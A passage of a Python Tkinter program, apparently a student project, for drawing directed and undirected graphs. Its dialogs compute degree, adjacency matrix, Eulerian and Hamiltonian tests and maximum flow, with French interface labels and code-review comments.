            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k))
            self.toplevel_dialog_label.grid(row=2)
        else:
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
            self.toplevel_dialog_label.grid(row=2)
    def ordre_graphe(self):
        """Open a modal window showing the order (vertex count) of the graph."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(502,50)
        self.toplevel_dialog.wm_title("Ordre du graphe")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=502
        hauteure=50
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
        n=len(self.sommets)
        self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n))
        self.toplevel_dialog_label.pack(side='top')
        self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True)
        # Spacer labels below the button.
        for i in range(3):
            self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n')
            self.toplevel_dialog_label3.pack()
        pass
    def sommet(self, event):
        """Double-click handler: draw a numbered vertex at the click position.

        A new vertex is refused when the click falls within 25px of an
        existing one.  NOTE(review): ``self.sommet = ...`` shadows this
        method with a canvas item id; the event binding captured in
        __init__ keeps working, but the attribute name is misleading.
        """
        x,y=event.x,event.y
        if self.point==[]:
            # First vertex: no overlap possible.
            self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan")
            self.numero=self.graphe.create_text(x,y,text="{}".format(self.i))
            self.point.append([event.x,event.y,self.sommet,self.numero,self.i])
            self.sommets.append(self.i)
            self.i+=1
        else:
            # Refuse the vertex if it overlaps an existing one.
            controle=0
            for element in self.point:
                if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25:
                    controle=1
            if controle==0:
                self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan")
                self.numero=self.graphe.create_text(x,y,text="{}".format(self.i))
                self.point.append([event.x,event.y,self.sommet,self.numero,self.i])
                self.sommets.append(self.i)
                self.i+=1
    # Right-click handler used to draw an arc between two vertices.
    def arc(self, event):
        """Collect arc endpoints; after the second click, ask for the weight."""
        # Record the clicked vertex (if the click hit one).
        for element in self.point:
            if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10:
                self.temp.append(element)
                self.compt+=1
        # Both endpoints chosen: open the modal weight dialog.
        if self.compt==2:
            self.wm_attributes("-disable",True)
            self.toplevel_dialog=tk.Toplevel(self)
            self.toplevel_dialog.minsize(502,100)
            self.toplevel_dialog.wm_title("Arc")
            width=self.toplevel_dialog.winfo_screenwidth()
            height=self.toplevel_dialog.winfo_screenheight()
            largeure=502
            hauteure=100
            x=(width/2)-(largeure/2)
            y=(height/2)-(hauteure/2)
            self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
            self.toplevel_dialog.transient(self)
            self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
            self.toplevel_dialog.bind("<Return>", self.Close_arc)
            self.toplevel_dialog.focus()
            self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4]))
            self.label.pack(side='top')
            self.valeur=tk.Entry(self.toplevel_dialog)
            self.valeur.pack(side='top')
            self.valeur.bind("<Return>", self.Close_arc)
            self.valeur.bind("<Escape>", self.Close_Toplevel)
            self.valeur.focus_set()
            self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
            self.yes_button.pack(side='right',fill='x',expand=True)
            self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc)
            self.yes_button.pack(side='right',fill='x',expand=True)
    def Close_arc (self,event=None):
        """Draw the arc between the two selected vertices and record it.

        Three cases by x-coordinate: left-to-right arrow, self-loop
        (same vertex clicked twice), right-to-left arrow.  The weight is
        parsed from the dialog entry; any non-integer or zero entry falls
        back to a weight of 1.
        """
        if self.temp[0][0] < self.temp[1][0]:
            # Source is left of destination: arrow points right.
            a=[self.temp[0][0]+10,self.temp[0][1]]
            b=[self.temp[1][0]-10,self.temp[1][1]]
            self.graphe.create_line(a,b,arrow="last")
            try:
                self.entier=int(self.valeur.get())
            except ValueError:
                # Non-numeric entry: keep the previous self.entier value.
                pass
            if self.entier>0 or self.entier<0 :
                pass
            else:
                self.entier=int(1)  # zero/unset weight defaults to 1
            self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
        elif self.temp[0][0]==self.temp[1][0]:
            # Same x: treat as a self-loop; redraw the vertex with a loop.
            self.graphe.delete(self.temp[0][2])
            self.graphe.delete(self.temp[0][3])
            self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1])
            self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan")
            self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4]))
            a=(self.temp[0][0],self.temp[0][1]-10.5)
            b=(self.temp[0][0],self.temp[0][1]-10)
            self.graphe.create_line(a,b,arrow="last")
            try:
                self.entier=int(self.valeur.get())
            except ValueError:
                pass
            if self.entier>0 or self.entier<0 :
                pass
            else:
                self.entier=int(1)
            self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
        else:
            # Source is right of destination: arrow points left.
            a=[self.temp[0][0]-10,self.temp[0][1]]
            b=[self.temp[1][0]+10,self.temp[1][1]]
            self.graphe.create_line(a,b,arrow="last")
            try:
                self.entier=int(self.valeur.get())
            except ValueError:
                pass
            if self.entier>0 or self.entier<0 :
                pass
            else:
                self.entier=int(1)
            self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
        # Reset the arc-in-progress state and close the dialog.
        self.compt=int()
        self.temp=list()
        self.wm_attributes("-disable",False)
        self.toplevel_dialog.destroy()
        self.deiconify()
###################################################################
#                - Undirected graph window -                      #
# /////////////////////////////////////////////////////////////// #
# Description: window for drawing and analysing UNDIRECTED graphs #
# (the original banner wrongly said "Graphe Orienter")            #
# /////////////////////////////////////////////////////////////// #
class Graphe_Non_Oriente(Tk):
    """Main window for drawing and analysing an undirected graph.

    Vertices are numbered from 0 and created with a double left click;
    edges are created by right-clicking each of the two end vertices and
    are stored in BOTH directions in ``self.couple`` as [src, dst, weight].
    Analysis commands (order, degree, adjacency matrix, successors,
    predecessors, Eulerian/Hamiltonian tests, max flow) run in modal
    Toplevel dialogs opened from the menu bar.
    """
    def __init__(self):
        Tk.__init__(self)  # parent-class constructor
        # screen size, used to centre the window
        width = self.winfo_screenwidth()
        height = self.winfo_screenheight()
        self.largeure = 900
        self.hauteure = 500
        self.x = (width / 2) - (self.largeure / 2)
        self.y = (height / 2) - (self.hauteure / 2)
        # drawing canvas
        self.graphe = Canvas(self, width=self.largeure, height=self.hauteure, bg="white")
        self.geometry('{}x{}+{}+{}'.format(self.largeure, self.hauteure, int(self.x), int(self.y)))
        self.resizable(False, False)
        self.wm_title('Graphe Non Oriente')
        self.graphe.pack(side=TOP, padx=5, pady=5)
        # mouse bindings: double left click -> vertex, right click -> edge
        self.bind("<Double-Button-1>", self.sommet)
        self.bind("<Button-3>", self.arc)
        # menu bar
        menubar = Menu(self)
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_separator()
        filemenu.add_command(label="Quitter ?", command=self.destroy)
        filemenu.add_command(label="Sauvegarder", command=self.save)
        menubar.add_cascade(label="Fichier", menu=filemenu)
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_separator()
        filemenu.add_command(label="Ordre du graphe", command=self.ordre_graphe)
        filemenu.add_command(label="Degre du sommet", command=self.degres_sommet)
        filemenu.add_command(label="Matrice d'adjacence", command=self.matriceAdj)
        filemenu.add_command(label="Successeur du sommet", command=self.successeur)
        filemenu.add_command(label="Predecesseur du sommet", command=self.predeccesseur)
        filemenu.add_command(label="Graphe Hamiltonien ?", command=self.hamilton)
        filemenu.add_command(label="Graphe Eulerien ?", command=self.euler)
        filemenu.add_command(label="Flow maximal", command=self.maxflow)
        menubar.add_cascade(label="Traitement", menu=filemenu)
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_command(label="Tout effacer ?", command=self.delete)
        menubar.add_cascade(label="Effacer", menu=filemenu)
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_command(label="Aide", command=self.aide)
        menubar.add_cascade(label="Aide", menu=filemenu)
        self.config(menu=menubar)
        # shared state
        self.i = 0             # number given to the next created vertex
        self.compt = int()     # vertices selected so far for the pending edge
        self.temp = list()     # selected vertices [x, y, oval_id, text_id, number]
        self.connect = list()
        self.point = list()    # every drawn vertex [x, y, oval_id, text_id, number]
        self.sommets = list()  # vertex numbers (0..i-1)
        self.couple = list()   # edges [src, dst, weight], stored in both directions
        self.matrice = list()  # last computed adjacency matrix
        self.var = StringVar()
        self.entier = int()    # weight of the last validated edge
    # ------------------------------------------------------------------
    # internal helpers (factor out code that was repeated in most dialogs)
    # ------------------------------------------------------------------
    def _ouvrir_dialogue(self, titre, largeure, hauteure, retour=None):
        """Open a centred modal Toplevel and disable the main window.

        *retour*, when given, is bound to the <Return> key of the dialog.
        """
        self.wm_attributes("-disable", True)
        self.toplevel_dialog = tk.Toplevel(self)
        self.toplevel_dialog.minsize(largeure, hauteure)
        self.toplevel_dialog.wm_title(titre)
        width = self.toplevel_dialog.winfo_screenwidth()
        height = self.toplevel_dialog.winfo_screenheight()
        x = (width / 2) - (largeure / 2)
        y = (height / 2) - (hauteure / 2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure, hauteure, int(x), int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        if retour is not None:
            self.toplevel_dialog.bind("<Return>", retour)
        self.toplevel_dialog.focus()  # BUG FIX: was misspelled focu()/fovus() in two dialogs
    def _formulaire_sommet(self, valider, colonne_valider, colonne_retour):
        """Lay out the 'Entrer sommet' entry plus Valider/Retour buttons."""
        self.label = tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
        self.label.grid(row=1)
        self.valeur = tk.Entry(self.toplevel_dialog)
        self.valeur.grid(row=1, column=1)
        self.valeur.bind("<Return>", valider)
        self.valeur.bind("<Escape>", self.Close_Toplevel)
        self.valeur.focus_set()
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.grid(row=1, column=colonne_retour)
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Valider', width=25, command=valider)
        self.yes_button.grid(row=1, column=colonne_valider)
    def _sommet_existe(self, texte):
        """Return True when *texte* is the label of an existing vertex.

        BUG FIX: the old check did ``texte in str(self.sommets)`` -- a
        substring test on the printed list, which accepted inputs such as
        '[' or ','.
        """
        return texte.isdigit() and int(texte) in self.sommets
    def _construire_matrice(self, poids=False):
        """Build and return the adjacency matrix from self.couple.

        A cell holds 1 when the edge exists (the stored weight instead when
        poids=True) and 0 otherwise.  The old per-dialog copies appended one
        cell per matching couple, so a duplicated edge corrupted the row.
        """
        taille = len(self.sommets)
        matrice = []
        for i in range(taille):
            ligne = []
            for j in range(taille):
                cellule = 0
                for element in self.couple:
                    if self.sommets[i] == element[0] and self.sommets[j] == element[1]:
                        cellule = element[2] if poids else 1
                ligne.append(cellule)
            matrice.append(ligne)
        return matrice
    def _lire_distance(self):
        """Parse the weight typed in the edge dialog.

        Falls back to 1 when the entry is empty, not an integer, or zero
        (the old code silently reused the previous weight on bad input).
        """
        try:
            valeur = int(self.valeur.get())
        except ValueError:
            valeur = 0
        return valeur if valeur != 0 else 1
    # ------------------------------------------------------------------
    # commands
    # ------------------------------------------------------------------
    def delete(self):
        """Clear the canvas and reset every piece of graph state."""
        for element in self.graphe.find_all():
            self.graphe.delete(element)
        self.i = 0
        self.compt = int()
        self.temp = list()
        self.connect = list()
        self.point = list()
        self.sommets = list()
        self.couple = list()
        self.matrice = list()
        self.var = StringVar()
        self.entier = int()
    def Close_Toplevel(self, event=None):
        """Close the current dialog and re-enable the main window.

        BUG FIX: accepts an optional *event* so it can be used both as a
        button command and as a <Return>/<Escape> binding (the bindings
        pass an Event argument and used to raise TypeError).
        """
        self.compt = int()
        self.temp = list()
        self.wm_attributes("-disable", False)
        self.toplevel_dialog.destroy()
        self.deiconify()
    def aide(self):
        """Show the short help dialog."""
        self._ouvrir_dialogue("Aide", 600, 150, retour=self.Close_Toplevel)
        aide = """
        Tracer un sommet: Double clic
        Tracer un arc: clic gauche sur chaque sommet
        """
        self.label = tk.Label(self.toplevel_dialog, text=aide, justify='left', font='Century 13 bold')
        self.label.pack(side='top')
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.pack(side='right', fill='x', expand=True)
    def Close_Save(self, event=None):
        """Grab the canvas area and save it as a PNG under save/.

        The file name comes from the entry widget; defaults to Graphe.png.
        """
        nom = self.var.get() if len(self.var.get()) > 0 else "Graphe"
        x = self.graphe.winfo_rootx()
        y = self.graphe.winfo_rooty()
        w = self.graphe.winfo_width()
        h = self.graphe.winfo_height()
        # the 2px inset skips the canvas border
        image = ImageGrab.grab((x + 2, y + 2, x + w - 2, y + h - 2))
        image.save("save/{}.png".format(nom))
        self.wm_attributes("-disable", False)
        self.toplevel_dialog.destroy()
        self.deiconify()
    def save(self):
        """Ask for a file name and save a screenshot of the canvas."""
        self._ouvrir_dialogue("Sauvegarder", 600, 100, retour=self.Close_Save)
        self.label = tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ')
        self.label.pack(side='left')
        self.var = tk.Entry(self.toplevel_dialog)
        self.var.pack(side='left')
        self.var.bind("<Return>", self.Close_Save)
        self.var.bind("<Escape>", self.Close_Toplevel)
        self.var.focus_set()
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.pack(side='right', fill='x', expand=True)
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Valider', width=25, command=self.Close_Save)
        self.yes_button.pack(side='right', fill='x', expand=True)
    def euler(self):
        """Tell whether the drawn graph is Eulerian (needs >= 2 vertices)."""
        self._ouvrir_dialogue("Graphe eulerien", 600, 100, retour=self.Close_Toplevel)
        l = len(self.couple)
        lg = len(self.sommets)
        if lg >= 2:
            g1 = Euler(lg)
            for i in range(l):
                g1.addEdge(self.couple[i][0], self.couple[i][1])
            self.var = g1.test()
            self.label = tk.Label(self.toplevel_dialog, text=self.var)
            self.label.pack(side='top')
        else:
            self.label = tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.pack(side='top')
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.pack(side='right', fill='x', expand=True)
    def hamilton(self):
        """Tell whether the drawn graph has a Hamiltonian cycle.

        BUG FIX: the old code called self.toplevel_dialog.focu(), which
        raised AttributeError and broke the dialog.
        """
        self._ouvrir_dialogue("Graphe hamiltonien", 600, 100, retour=self.Close_Toplevel)
        if len(self.couple) > 1:
            self.matrice = self._construire_matrice()
            g1 = Hamilton(len(self.sommets))
            g1.graph = self.matrice
            self.var = g1.hamCycle()
            self.label = tk.Label(self.toplevel_dialog, text=self.var)
            self.label.pack(side='top')
        else:
            self.label = tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.pack(side='top')
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.pack(side='right', fill='x', expand=True)
    def maxflow(self):
        """Ask for source/destination vertices and compute the max flow."""
        self._ouvrir_dialogue("Flow maximal", 600, 200)
        self.label = tk.Label(self.toplevel_dialog, text='Entrer sommet source: ')
        self.label.grid(row=1)
        self.valeur1 = tk.Entry(self.toplevel_dialog)
        self.valeur1.grid(row=1, column=1)
        self.label = tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ')
        self.label.grid(row=2)
        self.valeur2 = tk.Entry(self.toplevel_dialog)
        self.valeur2.grid(row=2, column=1)
        self.label = tk.Label(self.toplevel_dialog, text='\n\n')
        self.label.grid(row=3)
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Valider', width=25, command=self.Close_maxflow)
        self.yes_button.grid(row=4, column=1)
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.grid(row=4, column=3)
    def Close_maxflow(self, event=None):
        """Validate the max-flow dialog and display Ford-Fulkerson's result."""
        source = self.valeur1.get()
        destination = self.valeur2.get()
        if (self._sommet_existe(source) and self._sommet_existe(destination)
                and len(self.couple) > 0 and source != destination):
            # weighted adjacency matrix: cells hold edge capacities
            self.matrice = self._construire_matrice(poids=True)
            g = Max_flow(self.matrice)
            self.label = tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(int(source), int(destination)))
        else:
            self.label = tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
        self.label.grid(row=6)
    def matriceAdj(self):
        """Display the adjacency matrix, one labelled row per vertex."""
        self._ouvrir_dialogue("Matrice D'adjacence", 300, 300, retour=self.Close_Toplevel)
        if len(self.couple) > 0:
            self.matrice = self._construire_matrice()
            for i in range(len(self.matrice)):
                resultat = str(self.sommets[i]) + "| "
                for cellule in self.matrice[i]:
                    resultat += "{} ".format(cellule)
                self.label = tk.Label(self.toplevel_dialog, text=resultat)
                self.label.pack(side='top')
        else:
            self.label = tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.pack(side='top')
        self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
        self.yes_button.pack(side='right', fill='x', expand=True)
    def successeur(self):
        """Ask for a vertex and list its successors."""
        self._ouvrir_dialogue("Successeur d'un sommet", 650, 100, retour=self.Close_suc)
        self._formulaire_sommet(self.Close_suc, colonne_valider=4, colonne_retour=6)
    def Close_suc(self, event=None):
        """Display the successors of the vertex typed in the entry."""
        if self._sommet_existe(self.valeur.get()):
            resultat = ""
            for element in self.couple:
                if self.valeur.get() == str(element[0]):
                    resultat += str(element[1]) + " "
            texte = 'Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(), resultat)
        else:
            texte = 'Valeur entrer incorrecte'
        self.toplevel_dialog_label = tk.Label(self.toplevel_dialog, text=texte)
        self.toplevel_dialog_label.grid(row=2)
    def predeccesseur(self):
        """Ask for a vertex and list its predecessors."""
        self._ouvrir_dialogue("Predecesseur d'un sommet", 650, 100, retour=self.Close_pred)
        self._formulaire_sommet(self.Close_pred, colonne_valider=4, colonne_retour=6)
    def Close_pred(self, event=None):
        """Display the predecessors of the vertex typed in the entry."""
        if self._sommet_existe(self.valeur.get()):
            resultat = ""
            for element in self.couple:
                if self.valeur.get() == str(element[1]):
                    resultat += str(element[0]) + " "
            texte = 'Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(), resultat)
        else:
            texte = 'Valeur entrer incorrecte'
        self.toplevel_dialog_label = tk.Label(self.toplevel_dialog, text=texte)
        self.toplevel_dialog_label.grid(row=2)
    def degres_sommet(self):
        """Ask for a vertex and display its degree."""
        self._ouvrir_dialogue("Degre du sommet", 600, 100, retour=self.Close_degre)
        self._formulaire_sommet(self.Close_degre, colonne_valider=3, colonne_retour=5)
    def Close_degre(self, event=None):
        """Display the degree of the typed vertex.

        self.couple stores every undirected edge in both directions, so
        counting the entries arriving at the vertex gives its degree.
        """
        if self._sommet_existe(self.valeur.get()):
            k = 0
            for element in self.couple:
                if self.valeur.get() == str(element[1]):
                    k += 1
            texte = 'Le degre du sommet {} est: {}'.format(self.valeur.get(), k)
        else:
            texte = 'Valeur entrer incorrecte'
        self.toplevel_dialog_label = tk.Label(self.toplevel_dialog, text=texte)
        self.toplevel_dialog_label.grid(row=2)
    def ordre_graphe(self):
        """Display the order (vertex count) of the graph.

        BUG FIX: the old code called self.toplevel_dialog.fovus(), which
        raised AttributeError.
        """
        self._ouvrir_dialogue("Ordre du graphe", 502, 50, retour=self.Close_Toplevel)
        n = len(self.sommets)
        self.toplevel_dialog_label = tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n))
        self.toplevel_dialog_label.pack(side='top')
        self.toplevel_dialog_yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=82, command=self.Close_Toplevel)
        self.toplevel_dialog_yes_button.pack(side='right', fill='x', expand=True)
        for i in range(3):
            # filler so the button sits at the bottom of the dialog
            self.toplevel_dialog_label3 = tk.Label(self.toplevel_dialog, text='\n')
            self.toplevel_dialog_label3.pack()
    def sommet(self, event):
        """Double-click handler: create a vertex at the click position.

        Refuses a vertex closer than 25px to an existing one.  Uses locals
        for the canvas ids (the old code clobbered the bound method name
        ``self.sommet`` with an integer canvas id).
        """
        x, y = event.x, event.y
        for element in self.point:
            if element[0] - 25 < x < element[0] + 25 and element[1] - 25 < y < element[1] + 25:
                return
        cercle = self.graphe.create_oval(x - 10, y - 10, x + 10, y + 10, fill="cyan")
        numero = self.graphe.create_text(x, y, text="{}".format(self.i))
        self.point.append([x, y, cercle, numero, self.i])
        self.sommets.append(self.i)
        self.i += 1
    def arc(self, event):
        """Right-click handler: select an end vertex; once two vertices are
        selected, open the dialog asking for the edge weight.

        BUG FIX: the old code had ``self.toplevel_dialog.focus`` without
        parentheses, so the focus call never happened.
        """
        for element in self.point:
            if element[0] - 10 < event.x < element[0] + 10 and element[1] - 10 < event.y < element[1] + 10:
                self.temp.append(element)
                self.compt += 1
        if self.compt == 2:
            self._ouvrir_dialogue("Arc", 502, 100, retour=self.Close_arc)
            self.label = tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4], self.temp[1][4]))
            self.label.pack(side='top')
            self.valeur = tk.Entry(self.toplevel_dialog)
            self.valeur.pack(side='top')
            self.valeur.bind("<Return>", self.Close_arc)
            self.valeur.bind("<Escape>", self.Close_Toplevel)
            self.valeur.focus_set()
            self.yes_button = ttk.Button(self.toplevel_dialog, text='Retour', width=25, command=self.Close_Toplevel)
            self.yes_button.pack(side='right', fill='x', expand=True)
            self.yes_button = ttk.Button(self.toplevel_dialog, text='Valider', width=25, command=self.Close_arc)
            self.yes_button.pack(side='right', fill='x', expand=True)
    def Close_arc(self, event=None):
        """Validate the edge dialog: draw the edge on the canvas and record
        it in self.couple in BOTH directions (undirected graph)."""
        if self.temp[0][0] < self.temp[1][0]:
            # first vertex left of second: line drawn left -> right,
            # endpoints pulled in by 10px so the line meets the circles
            a = [self.temp[0][0] + 10, self.temp[0][1]]
            b = [self.temp[1][0] - 10, self.temp[1][1]]
            self.graphe.create_line(a, b)
        elif self.temp[0][0] == self.temp[1][0]:
            # same x: treated as a loop; redraw the vertex with a loop on top
            self.graphe.delete(self.temp[0][2])
            self.graphe.delete(self.temp[0][3])
            self.graphe.create_oval(self.temp[0][0]-10, self.temp[0][1]-25, self.temp[0][0]+1, self.temp[0][1])
            self.graphe.create_oval(self.temp[0][0]-10, self.temp[0][1]-10, self.temp[0][0]+10, self.temp[0][1]+10, fill="cyan")
            self.graphe.create_text(self.temp[0][0], self.temp[0][1], text="{}".format(self.temp[0][4]))
            a = (self.temp[0][0], self.temp[0][1] - 10.5)
            b = (self.temp[0][0], self.temp[0][1] - 10)
            self.graphe.create_line(a, b)
        else:
            # first vertex right of second: line drawn right -> left
            a = [self.temp[0][0] - 10, self.temp[0][1]]
            b = [self.temp[1][0] + 10, self.temp[1][1]]
            self.graphe.create_line(a, b)
        self.entier = self._lire_distance()
        # undirected edge: store the couple in both directions
        self.couple.append([self.temp[0][4], self.temp[1][4], self.entier])
        self.couple.append([self.temp[1][4], self.temp[0][4], self.entier])
        self.compt = int()
        self.temp = list()
        self.wm_attributes("-disable", False)
        self.toplevel_dialog.destroy()
        self.deiconify()
######################################################
# - Programme Principale - #
# /////////////////////////////////////////////// #
# Description: Fenetre Principale du Programme #
# /////////////////////////////////////////////// #
if __name__ == '__main__':
    # ----- main (launcher) window -------------------------------------
    fen = Tk()
    width = fen.winfo_screenwidth()
    height = fen.winfo_screenheight()
    largeure = 900
    hauteure = 500
    # centre the window on the screen
    x = (width / 2) - (largeure / 2)
    y = (height / 2) - (hauteure / 2)
    graphe = Canvas(fen, width=largeure, height=hauteure, bg="light yellow")
    fen.geometry('{}x{}+{}+{}'.format(largeure, hauteure, int(x), int(y)))
    fen.wm_title("Graphe Trace")
    graphe.pack(side=TOP, padx=5, pady=5)
    fen.resizable(False, False)
    # window icon and splash image
    icon = PhotoImage(file='img/img.png')
    fen.tk.call('wm', 'iconphoto', fen._w, icon)
    photo = PhotoImage(file="img/img.png", width=largeure, height=hauteure)
    graphe.create_image(300, 90, anchor=NW, image=photo)
    def menu():
        """Build the menu bar of the launcher window.

        BUG FIX: this function used to call fen.mainloop() itself; the
        single mainloop() call at the bottom of the script now runs the
        event loop, avoiding nested event loops.
        """
        menubar = Menu(fen)
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_command(label="Graphe Oriente", command=graphe_oriente)
        filemenu.add_command(label="Graphe Non Oriente", command=graphe_non_oriente)
        filemenu.add_separator()
        filemenu.add_command(label="Quitter", command=fen.destroy)
        menubar.add_cascade(label="Graphe", menu=filemenu)
        filemenu = Menu(menubar, tearoff=0)
        filemenu.add_command(label="Auteur", command=Auteur)
        filemenu.add_command(label="Description", command=Description)
        filemenu.add_command(label="Version", command=Version)
        menubar.add_cascade(label="A Propos", menu=filemenu)
        fen.config(menu=menubar)
    def graphe_oriente():
        """Open the directed-graph editor window (blocks until closed)."""
        app = GrapheOriente()
        app.mainloop()
    def graphe_non_oriente():
        """Open the undirected-graph editor window (blocks until closed)."""
        app = Graphe_Non_Oriente()
        app.mainloop()
    def Auteur():
        """Show the 'authors' about-dialog."""
        a_propos = """
    Ce logiciel a ete creer par des etudiants
    en deuxiemme annnee Miage.
    Notamment par:
    Sawadogo R.R Sylvain
    Sawadogo Sidbewende Omar
    Yameogo Pingdwinde Boris
    """
        fen.wm_attributes("-disable", True)
        fen.toplevel_dialog = tk.Toplevel(fen)
        fen.toplevel_dialog.minsize(502, 210)
        fen.toplevel_dialog.wm_title("Auteur")
        width = fen.toplevel_dialog.winfo_screenwidth()
        height = fen.toplevel_dialog.winfo_screenheight()
        largeure = 502
        hauteure = 210
        x = (width / 2) - (largeure / 2)
        y = (height / 2) - (hauteure / 2)
        fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure, hauteure, int(x), int(y)))
        fen.toplevel_dialog.transient(fen)
        fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel)
        fen.label = tk.Label(fen.toplevel_dialog, text=a_propos, justify='left', font='Century 13 bold')
        fen.label.grid(row=1, padx=5, pady=5)
        fen.yes_button = ttk.Button(fen.toplevel_dialog, text='Ok', width=82, command=Close_Toplevel)
        fen.yes_button.grid(row=2)
    def Description():
        """Show the 'description' about-dialog."""
        a_propos = """
    Ce logiciel a ete creer dans le cadre
    de traitement de graphe.
    """
        fen.wm_attributes("-disable", True)
        fen.toplevel_dialog = tk.Toplevel(fen)
        fen.toplevel_dialog.minsize(502, 126)
        fen.toplevel_dialog.wm_title("Description")
        width = fen.toplevel_dialog.winfo_screenwidth()
        height = fen.toplevel_dialog.winfo_screenheight()
        largeure = 502
        hauteure = 126
        x = (width / 2) - (largeure / 2)
        y = (height / 2) - (hauteure / 2)
        fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure, hauteure, int(x), int(y)))
        fen.toplevel_dialog.transient(fen)
        fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel)
        fen.label = tk.Label(fen.toplevel_dialog, text=a_propos, justify='left', font='Century 13 bold')
        fen.label.grid(row=1, padx=5, pady=5)
        fen.yes_button = ttk.Button(fen.toplevel_dialog, text='Ok', width=82, command=Close_Toplevel)
        fen.yes_button.grid(row=2)
    def Version():
        """Show the 'version' about-dialog."""
        a_propos = """Version 1.0.0"""
        fen.wm_attributes("-disable", True)
        fen.toplevel_dialog = tk.Toplevel(fen)
        fen.toplevel_dialog.minsize(300, 64)
        fen.toplevel_dialog.wm_title("Version")
        width = fen.toplevel_dialog.winfo_screenwidth()
        height = fen.toplevel_dialog.winfo_screenheight()
        largeure = 300
        hauteure = 64
        x = (width / 2) - (largeure / 2)
        y = (height / 2) - (hauteure / 2)
        fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure, hauteure, int(x), int(y)))
        fen.toplevel_dialog.transient(fen)
        fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel)
        fen.label = tk.Label(fen.toplevel_dialog, text=a_propos, justify='left', font='Century 13 bold')
        fen.label.grid(row=1, padx=5, pady=5)
        fen.yes_button = ttk.Button(fen.toplevel_dialog, text='Ok', width=48, command=Close_Toplevel)
        fen.yes_button.grid(row=4)
    def Close_Toplevel():
        """Close the current about-dialog and re-enable the main window."""
        fen.wm_attributes("-disable", False)
        fen.toplevel_dialog.destroy()
        fen.deiconify()
    menu()
    fen.mainloop()
